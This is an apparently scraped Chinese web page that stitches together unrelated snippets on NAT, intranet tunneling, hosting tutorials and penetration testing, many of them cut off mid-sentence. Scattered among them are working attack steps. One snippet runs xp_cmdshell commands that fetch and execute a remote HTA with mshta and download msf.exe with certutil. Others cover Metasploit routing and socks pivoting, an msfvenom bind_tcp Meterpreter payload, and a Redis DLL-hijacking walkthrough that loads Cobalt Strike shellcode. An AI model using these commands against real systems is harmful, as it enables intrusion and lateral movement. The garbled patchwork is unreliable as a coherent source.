1. 导入备份的数据库报错 复制 #1273 - Unknow collation: 'utf8mb4_unicode_cli' hostinger使用的mysql版本支持utf8mb4,而万网使用
为了保证业务数据的稳定安全,像金融、医疗等有特殊需求的行业,往往花费重金采购品牌数据库产品,然而,海量繁杂的数据也让企业的IT运维压力大大增加,需要投入具有高端专业资质的运维人员。这一现状为运维供应商带来机遇与挑战,供应商在熟稔市场上主流数据库产品的同时,还需要在技术上、知识储备上具备非常专业的运维服务资质。
爱疯网300M稳定PHP免费空间 提供的是 ispCP后台管理系统,站长(www.cmhello.com)也是第一次接触,好在 ispCP 很简单,所以很快就上手了。但是最近总有童鞋询问站长关于爱疯网主机的使用,于是就抽空发布这篇简单的教程,主要包含“域名管理”“FTP创建”“管理SQL”三部分,希望能给需要的朋友提供帮助。
EXEC master..xp_cmdshell 'mshta http://192.168.186.3:8080/yGwnzfy4cc.hta' 注意事项: 添加虚拟路由后配置hta_server模块选项时SRVHOST如果还用默认的0.0.0.0则生成URL的IP地址还是VPS的,所以在不出网主机上无法访问和执行,最终导致无法上线。 思路拓展: bind_tcp/reverse_tcp/reverse_tcp_rc4与hta_server的利用方式差不多,都要用到MSF虚拟路由,只是要重新生成/上传载荷文件。这种方式在某些不出网场景下“文件落地”可能是个麻烦事,不过在我们模拟的这个场景下可以利用这台可以出网的Web服务器来进行文件落地。 EXEC master..xp_cmdshell 'certutil -urlcache -split -f http://192.168.186.3/msf.exe C:\ProgramData\msf.exe' 0x04 Socks代理 + Proxychains 我们先用autoroute模块自动添加虚拟路由,再用MSF中的Socks模块开一个Socks代理,设置选项可以不做修改,直接默认执行即可。MSF6已将socks4/5都集成到socks_proxy模块中了。 run post/multi/manage/autoroute bg use auxiliary/server/socks4a exploit Socks4代理开好后找到/etc/proxychains.conf配置文件,在底部填入127.0.0.1和1080端口,然后再用proxychains代理工具执行curl或nc验证下看是否已经代理成功? proxychains curl http://192.168.186.4 proxychains nc -zv 192.168.186.4 1433 确定Socks代理没问题后再使用msfvenom生成一个bind_tcp载荷文件,通过中国菜刀将该文件上传至192.168.186.3的Web服务器中供192.168.186.4断网数据库服务器下载。 msfvenom -p windows/x64/meterpreter/bind_tcp lport=443 -f exe > /var/www/html/bind.exe 另起一个命令终端用proxychains代理工具来启动msfconsole,配置好handler监听模块bind_tcp相关选项执行监听,在中国菜刀中利用xp_cmdshell组件执行bind.exe文件后即可上线。 流量走向:
一个MSSQL非注入的场景:在内网扫描到一个MSSQL弱口令,支持xp_cmdshell,Administrator权限,但不能出网,DNS也出不了,那么我们该如何将文件落地到目标主机并执行上线呢?
我们接着上篇文章“利用MSF上线断网主机的思路分享”继续来分享一篇如何使用goproxy http代理方式上线不出网主机的利用姿势,结合上篇文章阅读更佳!!!
(这还是一篇水文)其实这篇文章就是记一次搭建一次对外开放的一个内网网盘,采用的是我以前发布的博文 Centos 搭建 Frp 内网映射服务 支持。 所以嘛如果看了这个的话,这篇文章并不难(也并没有什么教程意义)。
渗透测试就是利用我们所掌握的渗透知识,对网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一篇测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站进行漏洞修补,以防止黑客的入侵!
NAT英文全称是“Network Address Translation”,中文意思是“网络地址转换”,它是一个IETF(Internet Engineering Task Force, Internet工程任务组)标准,允许一个整体机构以一个公用IP(Internet Protocol)地址出现在Internet上。顾名思义,它是一种把内部私有网络地址(IP地址)翻译成合法网络IP地址的技术。因此我们可以认为,NAT在一定程度上,能够有效的解决公网地址不足的问题。
组长:安全室管理员 副组长:各部室安全管理员 成员:各业务负责人、安全厂商、业务厂商
NAT 英文全称是 Network Address Translation,中文意思是“网络地址转换”;
这篇文章由好友@Drunkmars投稿,写的非常详细,适合新手朋友学习,首发先知社区。
内网穿透 内网穿透,也即 NAT 穿透,进行 NAT 穿透是为了使具有某一个特定源 IP 地址和源端口号的数据包不被 NAT 设备屏蔽而正确路由到内网主机。下面就相互通信的主机在网络中与 NAT 设备的相对位置介绍内网穿透方法。 其实说白了就是让你的局域网/内网可以被公共场合访问。 内网穿透主要功能 在内网环境下的服务器和应用只有在同一个内网环境下才能访问连接,内网穿透可以实现外网对内网的访问连接。 如需要出差在外想要访问在公司内的电脑远程桌面连接,使用内网穿透即可以实现。 网站应用需要外网访问且考虑收录时
01 NAT的作用 TITTLES (1)在一定程度上缓解 IP 地址空间枯竭的压力 (2)有效避免来自外网的攻击,可以很大程度上提高网络安全性(屏蔽私网 ip) (3)控制内网主机访问外网,同时也可以控制外网主机访问内网,解决了内网 和外网不能互通的问题 02 NAT工作原理 TITTLES (1)Basic NAT 方式属于一对一的地址转换,在这种方式下只转换 IP 地址,而不处理 TCP/UDP 协议的端口号,一个公网 IP 地址不能同时被多个私网用户使用
具体实践中,公安部会组织攻防两方,进攻方会在一个月内对防守方发动网络攻击,检测出防守方(企事业单位)存在的安全漏洞。通过与进攻方的对抗,企事业单位网络、系统以及设备等的安全能力会大大提高。
打开你的命令行输入ipconfig查询你的Ip地址 打开百度,输入Ip查询,查询你的ip地址 你是不是发现了一件很神奇的事情,这两个地址是不一样的。但是我们又经常说每个主机只有一个ip,这个ip是他的身份标识。这完全矛盾啊。这就引出了我们今天要讲的NAT技术 其实并不矛盾。这里我们要引入公网ip和私网ip这两个概念,为什么百度查到的ip和ipconfig查到的不一样?大家看完
举例: 例如,假设有一个应用程序叫做"example.exe",它依赖于名为"example.dll"的动态链接库。而"example.exe"在加载"example.dll"时没有使用绝对路径,而是仅仅指定了DLL的名称。攻击者可以将恶意的"example.dll"文件放置在与"example.exe"相同的目录下,当"example.exe"启动时,系统会先在当前目录中查找"example.dll"文件,如果找到,就会加载该文件并执行其中的恶意代码。 DLL劫持可以函数转发劫持也可以往完整DLL插入恶意代码,这里用的函数转发劫持,大致流程如下图所示: https://kiwings.github.io/2019/04/04/th-DLL%E5%8A%AB%E6%8C%81/ 2.2 劫持dbghelp.dll redis-server.exe在执行bgsave时,会先在应用目录查找dbghelp.dll,找不到再去system32目录下找: 而不管redis的权限是Administrator还是普通用户或者Network Service,它对自己的应用目录一定有写文件的权限,我们可以通过Redis的主从复制在应用目录里写入恶意DLL。 2.3 函数转发劫持 对DLL进行函数转发劫持需要导出原本DLL的函数和地址,以保证程序通过恶意DLL调用这些函数时不影响正常功能,DLL的导出函数一般比较多,用Aheadlib之类的工具可以自动化处理。 我这里用的是DLLHijacker,它会自动处理导出表并生成一个VS2019的项目,但这个python脚本有几个bug: https://github.com/kiwings/DLLHijacker (1) VS项目中文乱码: 修复:几个写文件的地方添加 encoding="utf-8"。 (2) 函数导出表有匿名函数的时候,会导致以下报错 [-]Error occur: 'NoneType' object has no attribute 'decode 修复:在几个for循环里添加函数名是否为空的判断可以解决这个问题。 (3) 生成C/C++代码时,没有使用目标DLL的绝对路径,只是用了DLL的名字填充LoadLibrary(),这是一个很严重的bug,会导致函数转发失败、Redis的功能受到影响从而只能劫持一次: 修复:我改成了根据输入的目标DLL路径自动填充。 如果没有使用原DLL的绝对路径,在Process Monitor可以看到,只会调用应用程序目录里的恶意DLL,并没有调用原本的system32下的dbghelp.dll: 从而redis的功能受到影响,导致redis的bgsave只能触发一次DLL调用,第二次bgsave的进程会被阻塞从而无法调用DLL,并且Redis关闭后将无法启动: 这也是网上部分师傅的文章写”不会影响redis运行 但会无法重启“的原因,因为他们也是用的DLLHijacker,并且没有发现有这个坑,这不仅会影响业务,而且只能劫持一次: 正常的DLL劫持不会影响程序的功能,可以劫持很多次,假如我第一次劫持想上线CS但是没有成功,那对面可能不出网,那我可能会再劫持打一个MSF的反向shell,都没成功我也可以继续尝试MSF盲打命令: 正常的DLL转发劫持如下,调用完应用程序目录里的恶意DLL后会调用原DLL: 0x03 漏洞利用 3.1 工具使用 工具下载地址: https://github.com/P4r4d1se/dll_hijack 如是是Windows 64位的Redis DLL劫持的话,可以直接用里面的VS2022版的dbghelp项目。 其他要用我修改后的DllHijacker.py和目标DLL路径生成VS项目: python3 DLLHijacker.py C:\Windows\System32\dbghelp.dll 下载安装VS2022,只用勾C++桌面开发: https://visualstudio.microsoft.com/zh-hans/downloads 打开生成目录里的sln文件,因为原本是VS2019的项目所以会提醒你升级,选确定,不然得另外安装v142的编译组件才能编译VS2019的项目: 打开后在源文件的dllmain.app,修改里面的shellocde就行,其他不用改: 3.2 出网——Cobalt Strike 如果Redis主机直接出网,或者能通其他已经上线CS的出网主机,那直接上CS是最好的选择,CS生成C语言的payload: 源文件的dllmain.app里把payload替换进去,然后选Release x64,生成——生成解决方案: 然后主从复制将dbghelp.dll写过去并bg
在工作中,我们可能被要求在内网中建立一个DNS服务器,来让内网中的主机使用,通过对DNS服务器的解析更改,可以让内网中的主机无法访问某一个网址,亦或是访问内部网址,总之,建立企业内部的DNS服务器是及其重要的。接下来开始讲解如何基于Windows Server 2012 R2系统来建立DNS服务器。
在NAT路由器中会建立一个表,NAT转换表。这个表会记录对应的 内网地址 和 外网地址。
第1章 OSI回顾 1.1 TCP/IP协议族组成 应用层 主机到主机层 互联网层 网络接入层 1.2 总结应用层掌握的协议与端口号对应关系 http(80) telnet(23) ftp(
大规模的、联机式的信息储藏所,万维网用链接的方法从因特网上的一个站点访问另一个站点。
当然,iptbales不只可以设置默认规则,还可以手动加入很多规则。首先我们来看一下路由器的网卡配置:
当我们在外网打下一个点,通过arp,netstat,以及ifconifg(ipconfig)等信息收集,发现此点为dmz,可通内网,那么这时候我们需要在此点上搭建通向内网的隧道,为内网渗透打下坚实基础。
大家好,我是ABC_123,不知不觉,我一个人已经连续写了51篇原创文章了。本期复盘一次之前做过的某运营商的外网打点到内网横向过程,由于是好多年前的了,很多细节记不清了,但是关键步骤还记得。这次渗透过程的特点是内网很大,打到了域控及核心数据库区,但是却没用到什么高深技术,用的都是常规手段,经验很重要。接下来就把完整过程分享给大家,希望对大家有一些帮助。
lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议,可用于访问内网网站、本地支付接口调试、ssh访问、远程桌面等等,而且带有Web在线管理面板,添加端口配置十分简单。目前市面上提供类似服务的有花生壳、TeamView、GoToMyCloud等等,但要使用第三方的公网服务器就必须为第三方付费,并且这些服务都有各种各样的限制,此外,由于数据包会流经第三方,因此对数据安全也是一大隐患。
SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。这种对等通信对同一台主机上的 Beacon 和跨网络的 Beacon 都有效,即 SMB Beacon 通过管道( pipe)进行进程间的数据传递。管道通信的进程可以是本地主机上的两个进程,也可以和远程主机上的进程通过网络进行通信。Windows 将命名管道通信封装在 SMB 协议中,此流量封装在SMB协议中,所以SMB beacon相对隐蔽。SMB beacon不能直接生成可用载荷, 只能使用 PsExec 或 Stageless Payload 上线。
“又是比特币勒索!“黑客一次次给予Email.it公司机会”,然后谈判破裂后,被激怒的黑客愤而把这一窃取的数据公开在暗网出售。
多个网络还可以通过路由器互连起来,这样就构成了一个覆盖范围更大的网络,即互联网(或互连网) 因此,互联网是’网络的网络(Network of Networks)
什么是网闸?网闸(GAP)全称为安全隔离网闸(Security Gap),主要作用是在不同网络之间提供安全隔离的环境,防止潜在的网络攻击以及数据泄露和非必要的服务不给予访问权限,为避免传输协议的漏洞网闸内部传输数据通常是使用自定义的私有协议来进行传输数据。网闸中又分双向网闸,单向网闸。这两种网闸的区别就在业务的需求是怎么样的,单向就只能左方发送东西,右方方接收东西,要是右方想发东西给左方那就不行(一些正常的确认包是可以的,如果夹杂着其他东西就不行),双向网闸就能建立双方互发数据的规则。主要起到隔离作用的是他内部的构造,一台网闸的内外网接口是分开的,其连接方式是由内部两块主板通过中间的一块隔离卡所建策略以及安全厂商的加密算法来交换流量,具体构造如下:
NAT虽然带来了不少的好处,但是也增加了端对端直接通信的难度,NAT使得端对端的通信方式在某些场景下只能通过中转服务器进行交互。
这是几年前的一次内部渗透测试案例,通过几个小漏洞组合起来获得了大量敏感信息,起初在一个小的内网进行 nmap 扫描,没有发现什么特别有价值的信息,只发现一个 SMB 共享,如图:
闲着发慌,fofa找了一个weblogic,直接获取administrator权限。
女朋友问我淘宝网国际站的地址是什么,她想看看海淘上面都有哪些东西,于是我把网址:https://world.taobao.com 发给了她。于是有了以下对话。
文中引用了参考资料中的部分内容,本文参考资料详见文末“参考资料”一节,感谢资料分享者。
计算机网络(computer network)是大学计算机类专业和通讯类专业基础课程之一,也是计算机考研408核心科目之一。所以不管是考研的小伙伴,还是工作的小伙伴,我们都需要扎实的计算机网络知识。冷月帮大家总结了计算机网络的相关知识,停下脚步来学习学习。
前文分享了WannaCry勒索病毒,主要通过IDA和OD逆向分析蠕虫传播部分,详细讲解蠕虫是如何感染传播的。这篇文章将分享来自深信服老师的《外部威胁防护和勒索病毒对抗》,带领大家看看知名安全厂商的威胁防护措施,包括网络安全面临的挑战、如何有效的应对挑战、深信服安全建设之道等。基础性文章,希望对您有所帮助,如果存在侵权或不足之处,还望告知,加油!
在获得一台内网跳板机权限之后,想让相同内网其他主机上线 MSF,由于只有跳板机可以出网,如何能让其他不出网主机通过跳板机上线 MSF 呢?
SNAT Source Network Address Translation 源网络地址转换,其作用是将ip数据包的源地址转换成另外一个地址,可能有人觉得奇怪,好好的为什么要进行ip地址转换啊,为了弄懂这个问题,我们要看一下局域网用户上公网的原理,假设内网主机A(192.168.2.8)要和外网主机B(61.132.62.131)通信,A向B发出IP数据包,如果没有SNAT对A主机进行源地址转换,A与B主机的通讯会不正常中断,因为当路由器将内网的数据包发到公网IP后,公网IP会给你的私网IP回数据包,这时,公网IP根本就无法知道你的私网IP应该如何走了。所以问它上一级路由器,当然这是肯定的,因为从公网上根本就无法看到私网IP,因此你无法给他通信。为了实现数据包的正确发送及返回,网关必须将A的址转换为一个合法的公网地址,同时为了以后B主机能将数据包发送给A,这个合法的公网地址必须是网关的外网地址,如果是其它公网地址的话,B会把数据包发送到其它网关,而不是A主机所在的网关,A将收不到B发过来的数据包,所以内网主机要上公网就必须要有合法的公网地址,而得到这个地址的方法就是让网关进行SNAT(源地址转换),将内网地址转换成公网址(一般是网关的外部地址),所以大家经常会看到为了让内网用户上公网,我们必须在routeros的firewall中设置snat,俗称IP地址欺骗或伪装(masquerade)。
1、基本配置基本配置(接口 IP 地址、设备主机名等)【这里就不演示了,兄弟们可以自行设置】
第一次渗透测试有点紧张,就把这次渗透测试遇到的一些问题,小技巧记录下来做个分享和小结。
局域网 虽然目前我们所能看到的局域网主要是以双绞线为代表传输介质的以太网,那只不过是我们所看到都基本上是企、事业单位的局域网,在网络发展的早期或在其它各行各业中,因其行业特点所采用的局域网也不一定都是以太网,目前在局域网中常见的有:以太网(Ethernet)、令牌网(Token Ring)、FDDI网、异步传输模式网(ATM)等几类,下面分别作一些简要介绍。
随着Internet的发展和网络应用的增多,IPv4地址枯竭已经成为制约网络发展的瓶颈。尽管IPv6可以从根本上解决IPv4地址空间不足的问题,但目前众多的网络设备和网络应用仍是基于IPv4的,因此在IPv6广泛应用之前,一些过渡技术的使用是解决这个问题的主要技术手段。
由于自己一直做Python大数据挖掘技术开发,最近有不少的朋友要做大数据分析,找我帮忙爬商标网的数据,实现爬取中国商标网全部数据+监控同步每天新增注册的商标数据+支持异步搜索功能,做过数据爬虫挖掘的都知道,商标网是目前国内最难爬的网站之一,因为商标网请了中国第三方权威安全机构做了各种高级的发爬措施,我相信很多做技术的朋友在爬商标网的时候会遇到以下几个问题,今天我把我的经历和解决方案分享给大家。
在攻击机上,配置 /etc/proxychains.conf 文件的最后一行,根据当前攻击主机 IP 与设置的 Socks 端口,修改如下:
计算机网络概述主要是一些了解的知识,大家不用花太多的时间在这上面。其中计网的概念和计网的功能相对最重要,大家要记住。这一节一般是选择题考点。
很多人在注册或购买完域名之后,都不知道自己的域名注册信息可在哪里找到,其实懂行的人三两下就能够找到个人的注册信息。今天就来给大家简单的讲解一下域名注册信息可以在哪里找到,同时也会告诉大家域名到底是一个什么东西。
这是红日团队的第三套靶场(靶场下载地址见文末),本次靶场渗透涉及敏感信息泄露、暴力破解、脏牛提权、内网穿透、端口转发、以及域渗透等多种知识点。该靶场环境由5台机器组成,其中包括3台Windows机器和2台Linux机器。
1、申请学生套餐中免费的腾讯云服务器。首先需要通过学信网验证学生身份,之后腾讯每月会赠送一个满65元减64元的代金券,一直赠送到大学毕业。云服务器建议选择安装cent OS 6.x版本。安装时候需要记住系统镜像的密码,后续通过SSH连接服务器时需要填写这个密码。
当拿到权限之后,做完本地信息收集,最重要的就是做个隧道,对内网进行下一步攻击,这里简单介绍几个常用的工具,主要针对于出网和不出网两种情况。 出网情况 拿到服务器权限之后,遇见这种机器,十分简单,针对不同情况搭建不同隧道,为了速度可以建立sockets隧道、为了隐蔽可以使用dns隧道、icmp隧道等,本文简单介绍几个常用工具。 frp frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到
领取专属 10元无门槛券
手把手带您无忧上云